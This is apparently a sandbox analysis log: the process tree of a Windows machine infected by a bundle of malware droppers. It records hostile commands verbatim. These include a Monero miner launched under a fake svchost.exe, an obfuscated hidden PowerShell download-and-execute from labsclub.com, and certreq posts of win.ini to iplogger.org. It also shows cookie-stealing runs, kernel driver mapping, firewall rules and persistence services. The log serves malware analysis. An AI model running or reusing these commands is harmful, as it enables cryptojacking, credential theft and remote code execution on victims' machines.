C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6004 /prefetch:820⤵PID:7544
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:120⤵PID:5516
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6152 /prefetch:820⤵PID:1172
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3708 /prefetch:820⤵PID:5184
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5624 /prefetch:820⤵PID:7924
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3468 /prefetch:820⤵PID:6704
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5192 /prefetch:820⤵PID:7856
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4216 /prefetch:120⤵PID:7220
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5312 /prefetch:820⤵PID:7352
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4296 /prefetch:820⤵PID:6952
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2152 /prefetch:820⤵PID:7700
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1604,11037979427326742790,11641506524771916433,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=MAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAIAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=4588 /prefetch:220⤵PID:4216
-
-
-
-
-
-
C:\Windows\regedit.exeregedit /s chrome-set.reg16⤵
- Runs .reg file with regedit
PID:6556
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exeparse.exe -f json -b firefox16⤵PID:7240
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exeparse.exe -f json -b chrome16⤵PID:7288
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exeparse.exe -f json -b edge16⤵PID:7372
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-BTQ3N.tmp\DataFinder.exe"C:\Users\Admin\AppData\Local\Temp\is-BTQ3N.tmp\DataFinder.exe" /Verysilent12⤵PID:5692
-
C:\Users\Admin\Services.exe"C:\Users\Admin\Services.exe"13⤵PID:6600
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -B --coin=monero --asm=auto --cpu-memory-pool=-1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-us-east1.nanopool.org:14433 --user=42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s --pass= --cpu-max-threads-hint=50 --donate-level=5 --unam-idle-wait=5 --unam-idle-cpu=0 --nicehash --tls --unam-stealth14⤵PID:616
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-BTQ3N.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-BTQ3N.tmp\Delta.exe" /Verysilent12⤵PID:6636
-
C:\Users\Admin\AppData\Local\Temp\is-FP53S.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-FP53S.tmp\Delta.tmp" /SL5="$503EE,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-BTQ3N.tmp\Delta.exe" /Verysilent13⤵PID:6700
-
C:\Users\Admin\AppData\Local\Temp\is-4VQ19.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-4VQ19.tmp\Setup.exe" /VERYSILENT14⤵PID:4536
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & erase C:\Users\Admin\AppData\Local\Temp\is-4VQ19.tmp\Setup.exe & exit15⤵PID:6164
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f16⤵
- Kills process with taskkill
PID:3408
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-BTQ3N.tmp\zznote.exe"C:\Users\Admin\AppData\Local\Temp\is-BTQ3N.tmp\zznote.exe" /Verysilent12⤵PID:7948
-
C:\Users\Admin\AppData\Local\Temp\is-D0PPQ.tmp\zznote.tmp"C:\Users\Admin\AppData\Local\Temp\is-D0PPQ.tmp\zznote.tmp" /SL5="$30304,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-BTQ3N.tmp\zznote.exe" /Verysilent13⤵PID:7996
-
C:\Users\Admin\AppData\Local\Temp\is-U3PMD.tmp\jg4_4jaa.exe"C:\Users\Admin\AppData\Local\Temp\is-U3PMD.tmp\jg4_4jaa.exe" /silent14⤵PID:5940
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-BTQ3N.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-BTQ3N.tmp\hjjgaa.exe" /Verysilent12⤵PID:3892
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵PID:6628
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵PID:1748
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\oxoo1mpne0u\qfhebbww0zi.exe"C:\Users\Admin\AppData\Local\Temp\oxoo1mpne0u\qfhebbww0zi.exe" /ustwo INSTALL8⤵PID:3200
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3200 -s 6489⤵
- Program crash
PID:5900
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3200 -s 6649⤵
- Program crash
PID:6108
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3200 -s 7089⤵
- Program crash
PID:5576
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3200 -s 6809⤵
- Program crash
PID:5660
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3200 -s 8809⤵
- Program crash
PID:4996
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3200 -s 9569⤵
- Program crash
PID:5208
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3200 -s 11809⤵
- Program crash
PID:2524
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3200 -s 12209⤵
- Program crash
PID:4856
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3200 -s 12889⤵
- Program crash
PID:3824
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3200 -s 12809⤵
- Program crash
PID:3012
-
-
-
C:\Users\Admin\AppData\Local\Temp\yiuimbh3lqt\y5ack0yxof0.exe"C:\Users\Admin\AppData\Local\Temp\yiuimbh3lqt\y5ack0yxof0.exe" /VERYSILENT8⤵PID:4228
-
C:\Users\Admin\AppData\Local\Temp\is-VU8J7.tmp\y5ack0yxof0.tmp"C:\Users\Admin\AppData\Local\Temp\is-VU8J7.tmp\y5ack0yxof0.tmp" /SL5="$10222,870426,780800,C:\Users\Admin\AppData\Local\Temp\yiuimbh3lqt\y5ack0yxof0.exe" /VERYSILENT9⤵PID:4984
-
C:\Users\Admin\AppData\Local\Temp\is-KT2Q2.tmp\winlthst.exe"C:\Users\Admin\AppData\Local\Temp\is-KT2Q2.tmp\winlthst.exe" test1 test110⤵PID:4824
-
C:\Users\Admin\AppData\Local\Temp\Gu2lndhYy.exe"C:\Users\Admin\AppData\Local\Temp\Gu2lndhYy.exe"11⤵PID:3692
-
C:\Users\Admin\AppData\Local\Temp\Gu2lndhYy.exe"C:\Users\Admin\AppData\Local\Temp\Gu2lndhYy.exe"12⤵PID:5400
-
C:\Users\Admin\AppData\Local\Temp\1614544613537.exe"C:\Users\Admin\AppData\Local\Temp\1614544613537.exe"13⤵PID:4612
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe14⤵PID:7392
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"11⤵PID:5764
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"12⤵PID:4868
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\eaxhmm2jgit\app.exe"C:\Users\Admin\AppData\Local\Temp\eaxhmm2jgit\app.exe" /8-238⤵PID:5100
-
C:\Users\Admin\AppData\Local\Temp\lyOXGdIOHcmAFPjvHaoKaO\kdu.exeC:\Users\Admin\AppData\Local\Temp\lyOXGdIOHcmAFPjvHaoKaO\kdu.exe -map C:\Users\Admin\AppData\Local\Temp\lyOXGdIOHcmAFPjvHaoKaO\driver.sys9⤵PID:3728
-
-
C:\Users\Admin\AppData\Local\Temp\eaxhmm2jgit\app.exe"C:\Users\Admin\AppData\Local\Temp\eaxhmm2jgit\app.exe" /8-239⤵PID:6280
-
C:\Users\Admin\AppData\Local\Temp\ZuDINSabGqhO\kdu.exeC:\Users\Admin\AppData\Local\Temp\ZuDINSabGqhO\kdu.exe -map C:\Users\Admin\AppData\Local\Temp\ZuDINSabGqhO\driver.sys10⤵PID:7700
-
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"10⤵PID:2328
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes11⤵PID:7724
-
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe /8-2310⤵PID:7624
-
C:\Users\Admin\AppData\Local\Temp\hbKJNUnJFCtTUEfXMKmSyMq\kdu.exeC:\Users\Admin\AppData\Local\Temp\hbKJNUnJFCtTUEfXMKmSyMq\kdu.exe -map C:\Users\Admin\AppData\Local\Temp\hbKJNUnJFCtTUEfXMKmSyMq\driver.sys11⤵PID:5808
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nqycxgehknm\vpn.exe"C:\Users\Admin\AppData\Local\Temp\nqycxgehknm\vpn.exe" /silent /subid=4828⤵PID:4580
-
C:\Users\Admin\AppData\Local\Temp\is-JT8HK.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-JT8HK.tmp\vpn.tmp" /SL5="$20266,15170975,270336,C:\Users\Admin\AppData\Local\Temp\nqycxgehknm\vpn.exe" /silent /subid=4829⤵PID:788
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "10⤵PID:4548
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090111⤵PID:1776
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "10⤵PID:5160
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090111⤵PID:6024
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall10⤵PID:7536
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install10⤵PID:8188
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\pfgtnmcdl4r\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\pfgtnmcdl4r\chashepro3.exe" /VERYSILENT8⤵PID:2848
-
-
C:\Users\Admin\AppData\Local\Temp\ixvoogglpmh\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\ixvoogglpmh\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵PID:4776
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"4⤵PID:4500
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"4⤵PID:4744
-
C:\ProgramData\2960324.32"C:\ProgramData\2960324.32"5⤵PID:2792
-
-
C:\ProgramData\704149.7"C:\ProgramData\704149.7"5⤵PID:3956
-
C:\ProgramData\Windows Host\Windows Host.exe"C:\ProgramData\Windows Host\Windows Host.exe"6⤵PID:960
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"4⤵PID:3336
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵PID:1504
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
PID:5476
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"4⤵PID:5268
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:5984
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:3764
-
-
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
PID:2800 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 692C203E674E2088E4C378A8ED1B8735 C2⤵
- Loads dropped DLL
PID:1064
-
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵PID:2352
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:2108
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵PID:4384
-
C:\Users\Admin\AppData\Local\Temp\is-L991G.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-L991G.tmp\chashepro3.tmp" /SL5="$202C6,3362400,58368,C:\Users\Admin\AppData\Local\Temp\pfgtnmcdl4r\chashepro3.exe" /VERYSILENT1⤵PID:2568
-
C:\Program Files (x86)\JCleaner\gl.exe"C:\Program Files (x86)\JCleaner\gl.exe"2⤵PID:2492
-
C:\Program Files (x86)\JCleaner\gl.exe"C:\Program Files (x86)\JCleaner\gl.exe"3⤵PID:2340
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c certreq -post -config https://iplogger.org/1hTS97 %windir%\\win.ini %temp%\\2 & del %temp%\\22⤵PID:4888
-
C:\Windows\SysWOW64\certreq.execertreq -post -config https://iplogger.org/1hTS97 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\23⤵PID:5880
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1hTS97"2⤵PID:1188
-
-
C:\Program Files (x86)\JCleaner\ww.exe"C:\Program Files (x86)\JCleaner\ww.exe"2⤵PID:5156
-
C:\Program Files (x86)\JCleaner\ww.exe"C:\Program Files (x86)\JCleaner\ww.exe"3⤵PID:4624
-
-
-
C:\Program Files (x86)\JCleaner\jayson.exe"C:\Program Files (x86)\JCleaner\jayson.exe"2⤵PID:5148
-
C:\Program Files (x86)\JCleaner\jayson.exe"C:\Program Files (x86)\JCleaner\jayson.exe"3⤵PID:3252
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"2⤵PID:5140
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/1aSny7"2⤵PID:5132
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c certreq -post -config https://iplogger.org/1aSny7 %windir%\\win.ini %temp%\\2 & del %temp%\\22⤵PID:5124
-
C:\Windows\SysWOW64\certreq.execertreq -post -config https://iplogger.org/1aSny7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\23⤵PID:5908
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c certreq -post -config https://iplogger.org/1EaGq7 %windir%\\win.ini %temp%\\2 & del %temp%\\22⤵PID:4620
-
C:\Windows\SysWOW64\certreq.execertreq -post -config https://iplogger.org/1EaGq7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\23⤵PID:5920
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/1EaGq7"2⤵PID:4860
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1EaGq7"2⤵PID:1932
-
-
C:\Users\Admin\AppData\Local\Temp\is-9BV7O.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-9BV7O.tmp\IBInstaller_97039.tmp" /SL5="$503E0,14464800,721408,C:\Users\Admin\AppData\Local\Temp\ixvoogglpmh\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq1⤵PID:5492
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://dropskeyssellbuy.xyz/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=970392⤵PID:6028
-
-
C:\Users\Admin\AppData\Local\Temp\is-8I5U5.tmp\{app}\chrome_proxy.exe"C:\Users\Admin\AppData\Local\Temp\is-8I5U5.tmp\{app}\chrome_proxy.exe"2⤵PID:6056
-
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\f2ee9b812b8a4624a37e1370b6541783 /t 2516 /p 25521⤵PID:5808
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:4564
-
C:\Users\Admin\AppData\Local\Temp\CB7A.exeC:\Users\Admin\AppData\Local\Temp\CB7A.exe2⤵PID:7676
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\66607880-e874-458e-870c-3fbcdd7965b8" /deny *S-1-1-0:(OI)(CI)(DE,DC)3⤵
- Modifies file permissions
PID:3348
-
-
C:\Users\Admin\AppData\Local\Temp\CB7A.exe"C:\Users\Admin\AppData\Local\Temp\CB7A.exe" --Admin IsNotAutoStart IsNotTask3⤵PID:1600
-
-
-
C:\Users\Admin\AppData\Local\Temp\F5F6.exeC:\Users\Admin\AppData\Local\Temp\F5F6.exe2⤵PID:7928
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo dbvicTgbw3⤵PID:196
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Lana.vstx3⤵PID:5352
-
C:\Windows\SysWOW64\cmd.execmd4⤵PID:6812
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\23BD.exeC:\Users\Admin\AppData\Local\Temp\23BD.exe2⤵PID:5636
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\23BD.exe"3⤵PID:5420
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK4⤵
- Delays execution with timeout.exe
PID:2388
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\58B9.exeC:\Users\Admin\AppData\Local\Temp\58B9.exe2⤵PID:7296
-
-
C:\Users\Admin\AppData\Local\Temp\8018.exeC:\Users\Admin\AppData\Local\Temp\8018.exe2⤵PID:6936
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\sgyhbcur\3⤵PID:6148
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\iccteneg.exe" C:\Windows\SysWOW64\sgyhbcur\3⤵PID:7040
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create sgyhbcur binPath= "C:\Windows\SysWOW64\sgyhbcur\iccteneg.exe /d\"C:\Users\Admin\AppData\Local\Temp\8018.exe\"" type= own start= auto DisplayName= "wifi support"3⤵PID:6576
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description sgyhbcur "wifi internet conection"3⤵PID:1376
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start sgyhbcur3⤵PID:7360
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul3⤵PID:7692
-
-
-
C:\Users\Admin\AppData\Local\Temp\B802.exeC:\Users\Admin\AppData\Local\Temp\B802.exe2⤵PID:5700
-
-
C:\Users\Admin\AppData\Local\Temp\C8B.exeC:\Users\Admin\AppData\Local\Temp\C8B.exe2⤵PID:8180
-
C:\Users\Admin\AppData\Local\Temp\C8B.exeC:\Users\Admin\AppData\Local\Temp\C8B.exe3⤵PID:4180
-
-
-
C:\Users\Admin\AppData\Local\Temp\46E6.exeC:\Users\Admin\AppData\Local\Temp\46E6.exe2⤵PID:7992
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵PID:5952
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵PID:3104
-
-
-
C:\Users\Admin\AppData\Local\Temp\7336.exeC:\Users\Admin\AppData\Local\Temp\7336.exe2⤵PID:6952
-
-
C:\Users\Admin\AppData\Local\Temp\9CF7.exeC:\Users\Admin\AppData\Local\Temp\9CF7.exe2⤵PID:6616
-
-
C:\Users\Admin\AppData\Local\Temp\B4A6.exeC:\Users\Admin\AppData\Local\Temp\B4A6.exe2⤵PID:7936
-
C:\Users\Admin\AppData\Local\Temp\is-Q7VHR.tmp\B4A6.tmp"C:\Users\Admin\AppData\Local\Temp\is-Q7VHR.tmp\B4A6.tmp" /SL5="$2041E,300262,216576,C:\Users\Admin\AppData\Local\Temp\B4A6.exe"3⤵PID:4520
-
C:\Users\Admin\AppData\Local\Temp\is-F787C.tmp\ST.exe"C:\Users\Admin\AppData\Local\Temp\is-F787C.tmp\ST.exe" /S /UID=lab2124⤵PID:6284
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\BCC6.exeC:\Users\Admin\AppData\Local\Temp\BCC6.exe2⤵PID:4360
-
-
C:\Users\Admin\AppData\Local\Temp\BF86.tmp.exeC:\Users\Admin\AppData\Local\Temp\BF86.tmp.exe2⤵PID:6400
-
-
C:\Users\Admin\AppData\Local\Temp\D59F.tmp.exeC:\Users\Admin\AppData\Local\Temp\D59F.tmp.exe2⤵PID:7924
-
-
C:\Users\Admin\AppData\Local\Temp\1DC5.tmp.exeC:\Users\Admin\AppData\Local\Temp\1DC5.tmp.exe2⤵PID:6404
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵PID:3556
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{46662f9c-acb7-6948-8571-413cf1cd950d}\oemvista.inf" "9" "4d14a44ff" "0000000000000168" "WinSta0\Default" "0000000000000170" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵PID:3528
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000170"2⤵PID:6396
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵PID:4080
-
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca1⤵PID:4572
-
C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca1⤵PID:3728
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:6496
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵PID:6488
-
